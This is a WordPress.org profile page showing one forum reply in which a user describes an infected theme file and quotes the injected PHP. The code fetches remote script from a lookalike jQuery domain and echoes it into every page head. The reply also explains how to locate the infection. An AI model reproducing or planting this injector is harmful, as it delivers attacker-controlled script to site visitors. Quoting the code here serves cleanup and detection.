Title: profix's Replies | WordPress.org

---

# profix

  [  ](https://wordpress.org/support/users/profix/)

 *   [Profile](https://wordpress.org/support/users/profix/)
 *   [Topics Started](https://wordpress.org/support/users/profix/topics/)
 *   [Replies Created](https://wordpress.org/support/users/profix/replies/)
 *   [Reviews Written](https://wordpress.org/support/users/profix/reviews/)
 *   [Topics Replied To](https://wordpress.org/support/users/profix/replied-to/)
 *   [Engagements](https://wordpress.org/support/users/profix/engagements/)
 *   [Favorites](https://wordpress.org/support/users/profix/favorites/)

 Search replies:

## Forum Replies Created

Viewing 1 replies (of 1 total)

 *   Forum: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
   
   In reply to: [Unwanted Jquery (jquerys) script](https://wordpress.org/support/topic/unwanted-jquery-script/)
 *  [profix](https://wordpress.org/support/users/profix/)
 * (@profix)
 * [13 years, 6 months ago](https://wordpress.org/support/topic/unwanted-jquery-script/page/4/#post-2936406)
 * **In my case infected file was include\functions-init.php. **
 * URL: [http://www.jquerye.com/jquery-1.6.3.min.js](http://www.jquerye.com/jquery-1.6.3.min.js)
 * Line 1: <?php if (!function_exists(‘insert_inj’)){function insert_inj(){if (function_exists(‘
   curl_init’)){$url = “[http://www.jquerye.com/jquery-1.6.3.min.js&#8221](http://www.jquerye.com/jquery-1.6.3.min.js&#8221);;
   $ch = curl_init(); $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt(
   $ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
   $data = curl_exec($ch);curl_close($ch);echo $data;}}add_action(‘wp_head’, ‘insert_inj’);}?
   >
 * Download theme folder first, then download Notepad++ and open it, go to Find -
   > Find in files type in jquery-1.6.3.min.js, browse your downloaded theme folder.

Viewing 1 replies (of 1 total)